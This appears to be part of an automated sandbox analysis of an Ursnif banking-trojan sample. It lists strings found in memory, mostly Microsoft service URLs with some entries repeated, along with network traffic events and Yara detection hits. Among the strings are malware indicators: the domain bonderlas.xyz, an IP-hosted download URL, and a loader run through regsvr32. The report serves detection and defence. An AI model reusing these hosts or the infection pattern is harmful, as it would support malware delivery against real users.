            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: Dori.ocx.0.drString found in binary or memory: https://sectigo.com/CPS0
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://settings.outlook.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.com/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://tasks.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://templatelogging.office.com/client/log
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://wus2-000.contentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmpString found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
            Source: sharedStrings.binString found in binary or memory: http://45.138.72.84/10.11nov322.gif
            Source: Dori.ocx.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
            Source: Dori.ocx.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
            Source: Dori.ocx.0.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: msapplication.xml.5.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.5.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.5.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.5.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.5.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.5.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.5.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.5.drString found in binary or memory: http://www.youtube.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.aadrm.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.office.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.onedrive.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://augloop.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://augloop.office.com/v2
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://autodiscover-s.outlook.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: regsvr32.exe, regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmpString found in binary or memory: https://bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000002.494838994.00000000064F0000.00000004.00000040.sdmp, ~DF4EEB7094F37C54EC.TMP.34.drString found in binary or memory: https://bonderlas.xyz/index.htm
            Source: {BE482461-25FC-11EB-90E4-ECF4BB862DED}.dat.5.drString found in binary or memory: https://bonderlas.xyz/index.htmRoot
            Source: {BE482461-25FC-11EB-90E4-ECF4BB862DED}.dat.5.drString found in binary or memory: https://bonderlas.xyz/index.htmindex.htm
            Source: regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmpString found in binary or memory: https://bonderlas.xyzQ
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.entity.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://config.edge.skype.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cortana.ai
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cr.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://directory.services.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.windows.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.windows.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://lifecycle.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows.local
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://management.azure.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://management.azure.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://messaging.office.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ncus-000.contentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officeapps.live.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://onedrive.live.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office365.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: Dori.ocx.0.drString found in binary or memory: https://sectigo.com/CPS0
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://settings.outlook.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.com/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://tasks.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://templatelogging.office.com/client/log
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://wus2-000.contentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.229213427.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230412465.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230133784.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230002994.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230288544.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229859937.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230087172.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.228968821.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229570245.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229688764.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230173601.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230402228.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229749717.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229955988.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.235674232.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230206187.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229807258.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229908989.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229052631.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.228882169.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229435094.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.229503794.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.494838994.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.230387703.00000000064F0000.00000004.00000040.sdmp, type: MEMORY
